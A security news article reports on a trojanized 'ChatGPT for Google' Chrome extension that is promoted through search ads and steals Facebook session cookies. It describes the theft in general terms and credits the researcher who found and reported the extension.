A trojanized version of the popular ChatGPT extension for Google Chrome has been discovered on the Chrome Web Store.
The malicious extension has already amassed over 9,000 downloads while stealing Facebook accounts. The malware was initially uploaded to the Chrome Web Store on February 14, 2023, but was only promoted using Google Search advertisements on March 14, 2023. Since then, it has had an average of a thousand installations per day.
The extension is a copy of the legitimate “ChatGPT for Google” add-on that provides ChatGPT integration on search results.
However, it includes additional code that attempts to steal Facebook session cookies. After the victim installs the extension, the malicious code uses the OnInstalled handler function to steal Facebook session cookies, allowing the threat actors to log in to a Facebook account as the user and gain full access to their profiles, including any business advertising features.
The malicious extension is promoted via advertisements in Google Search results, which are prominently featured when searching for “Chat GPT 4.” Clicking on the sponsored search results takes users to a fake “ChatGPT for Google” landing page, and from there, to the extension’s page on Chrome’s official add-on store.
Upon installation, the malware abuses the Chrome Extension API to acquire a list of Facebook-related cookies and encrypts them using an AES key. It then exfiltrates the stolen data via a GET request to the attacker’s server.
The security researcher who discovered the malware, Nati Tal of Guardio Labs, reported the malicious extension to the Chrome Web Store team, which will likely remove it soon. However, the threat actors likely have a plan ‘C’ via another “parked” extension that could facilitate the next infection wave.
This latest campaign is part of a broader trend of cybercriminals targeting browser extensions to steal sensitive data and gain access to online accounts.
